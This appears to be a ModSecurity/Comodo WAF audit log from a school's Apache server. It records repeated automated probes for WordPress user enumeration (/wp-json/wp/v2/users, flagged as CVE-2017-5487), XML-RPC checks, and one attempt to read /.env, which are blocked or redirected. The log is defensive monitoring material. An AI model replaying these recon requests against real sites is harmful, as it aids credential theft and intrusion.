text/html; charset=iso-8859-1 --f08c8519-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746871756081542 6473 (- - -) Stopwatch2: 1746871756081542 6473; combined=4966, p1=653, p2=4096, p3=35, p4=39, p5=84, sr=116, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f08c8519-Z-- --afe91722-A-- [10/May/2025:17:14:39 +0700] aB8nD6uC4AqLGUOyzyU1TgAAAII 103.236.140.4 46428 103.236.140.4 8181 --afe91722-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --afe91722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afe91722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746872079283391 2810 (- - -) Stopwatch2: 1746872079283391 2810; combined=1485, p1=515, p2=938, p3=0, p4=0, p5=32, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afe91722-Z-- --0e345b3e-A-- [10/May/2025:17:14:42 +0700] aB8nEquC4AqLGUOyzyU1VQAAAIA 103.236.140.4 46488 103.236.140.4 8181 --0e345b3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e345b3e-C-- demo.sayHello --0e345b3e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e345b3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746872082282941 5646 (- - -) Stopwatch2: 1746872082282941 5646; combined=4199, p1=561, p2=3390, p3=31, p4=37, p5=105, sr=85, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e345b3e-Z-- --6f7c4071-A-- [10/May/2025:17:20:24 +0700] aB8oaNr9PbfRBMhzxmSgcQAAAEI 103.236.140.4 53566 103.236.140.4 8181 --6f7c4071-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f7c4071-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f7c4071-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746872424305000 2206 (- - -) Stopwatch2: 1746872424305000 2206; combined=1203, p1=399, p2=775, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f7c4071-Z-- --1d02781e-A-- [10/May/2025:17:20:29 +0700] aB8obci6w7GTj2w44Z7i8wAAAMU 103.236.140.4 53670 103.236.140.4 8181 --1d02781e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1d02781e-C-- demo.sayHello --1d02781e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d02781e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746872429035475 5817 (- - -) Stopwatch2: 1746872429035475 5817; combined=4331, p1=535, p2=3571, p3=32, p4=34, p5=94, sr=71, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d02781e-Z-- --e7262f24-A-- [10/May/2025:17:34:44 +0700] aB8rxMi6w7GTj2w44Z7mIAAAAM8 103.236.140.4 35810 103.236.140.4 8181 --e7262f24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.164.200 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.164.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e7262f24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7262f24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746873284248938 716 (- - -) Stopwatch2: 1746873284248938 716; combined=293, p1=257, p2=0, p3=0, p4=0, p5=35, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7262f24-Z-- --1756d96b-A-- [10/May/2025:17:34:56 +0700] aB8r0Mi6w7GTj2w44Z7mLwAAANY 103.236.140.4 35840 103.236.140.4 8181 --1756d96b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1756d96b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1756d96b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873296363169 2158 (- - -) Stopwatch2: 1746873296363169 2158; combined=1149, p1=377, p2=743, p3=0, p4=0, p5=28, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1756d96b-Z-- --b01d646a-A-- [10/May/2025:17:35:05 +0700] aB8r2ci6w7GTj2w44Z7mPAAAAMg 103.236.140.4 35866 103.236.140.4 8181 --b01d646a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.190 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b01d646a-C-- demo.sayHello --b01d646a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b01d646a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873305090577 5553 (- - -) Stopwatch2: 1746873305090577 5553; combined=4230, p1=545, p2=3454, p3=32, p4=38, p5=95, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b01d646a-Z-- --97efac78-A-- [10/May/2025:17:35:23 +0700] aB8r68i6w7GTj2w44Z7mUwAAAMU 103.236.140.4 35912 103.236.140.4 8181 --97efac78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --97efac78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97efac78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873323399400 2268 (- - -) Stopwatch2: 1746873323399400 2268; combined=1181, p1=393, p2=759, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97efac78-Z-- --bbc58e66-A-- [10/May/2025:17:35:33 +0700] aB8r9ci6w7GTj2w44Z7mawAAAMg 103.236.140.4 35962 103.236.140.4 8181 --bbc58e66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bbc58e66-C-- demo.sayHello --bbc58e66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbc58e66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873333694457 5147 (- - -) Stopwatch2: 1746873333694457 5147; combined=4179, p1=485, p2=3405, p3=30, p4=33, p5=127, sr=75, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbc58e66-Z-- --b8a5e76c-A-- [10/May/2025:17:36:28 +0700] aB8sLMi6w7GTj2w44Z7mrgAAAMY 103.236.140.4 36108 103.236.140.4 8181 --b8a5e76c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b8a5e76c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8a5e76c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873388910689 2220 (- - -) Stopwatch2: 1746873388910689 2220; combined=1254, p1=390, p2=834, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8a5e76c-Z-- --31ea5a7f-A-- [10/May/2025:17:36:44 +0700] aB8sPMi6w7GTj2w44Z7msAAAAMU 103.236.140.4 36112 103.236.140.4 8181 --31ea5a7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31ea5a7f-C-- demo.sayHello --31ea5a7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31ea5a7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873404490244 4468 (- - -) Stopwatch2: 1746873404490244 4468; combined=3473, p1=433, p2=2847, p3=22, p4=23, p5=87, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31ea5a7f-Z-- --951b9d3b-A-- [10/May/2025:17:36:50 +0700] aB8sQtr9PbfRBMhzxmSioQAAAEQ 103.236.140.4 36116 103.236.140.4 8181 --951b9d3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --951b9d3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --951b9d3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873410184812 2262 (- - -) Stopwatch2: 1746873410184812 2262; combined=1068, p1=387, p2=649, p3=0, p4=0, p5=32, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --951b9d3b-Z-- --8d36b44c-A-- [10/May/2025:17:36:57 +0700] aB8sSauC4AqLGUOyzyU51AAAAIo 103.236.140.4 36120 103.236.140.4 8181 --8d36b44c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8d36b44c-C-- demo.sayHello --8d36b44c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d36b44c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873417690583 4473 (- - -) Stopwatch2: 1746873417690583 4473; combined=3523, p1=426, p2=2896, p3=25, p4=25, p5=88, sr=66, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d36b44c-Z-- --2d2a5669-A-- [10/May/2025:17:37:02 +0700] aB8sThLuBiaF9R054QCrkwAAAAE 103.236.140.4 36124 103.236.140.4 8181 --2d2a5669-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2d2a5669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d2a5669-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873422228005 2760 (- - -) Stopwatch2: 1746873422228005 2760; combined=1307, p1=432, p2=849, p3=0, p4=0, p5=26, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d2a5669-Z-- --5cc9a042-A-- [10/May/2025:17:37:09 +0700] aB8sVauC4AqLGUOyzyU51QAAAIg 103.236.140.4 36128 103.236.140.4 8181 --5cc9a042-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5cc9a042-C-- demo.sayHello --5cc9a042-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cc9a042-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873429021224 5897 (- - -) Stopwatch2: 1746873429021224 5897; combined=4250, p1=527, p2=3489, p3=31, p4=35, p5=99, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cc9a042-Z-- --f232930b-A-- [10/May/2025:17:37:25 +0700] aB8sZauC4AqLGUOyzyU51wAAAI4 103.236.140.4 36132 103.236.140.4 8181 --f232930b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f232930b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f232930b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873445657721 2128 (- - -) Stopwatch2: 1746873445657721 2128; combined=1039, p1=334, p2=678, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f232930b-Z-- --28757977-A-- [10/May/2025:17:37:31 +0700] aB8sa8i6w7GTj2w44Z7msQAAAMg 103.236.140.4 36136 103.236.140.4 8181 --28757977-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.249 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --28757977-C-- demo.sayHello --28757977-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 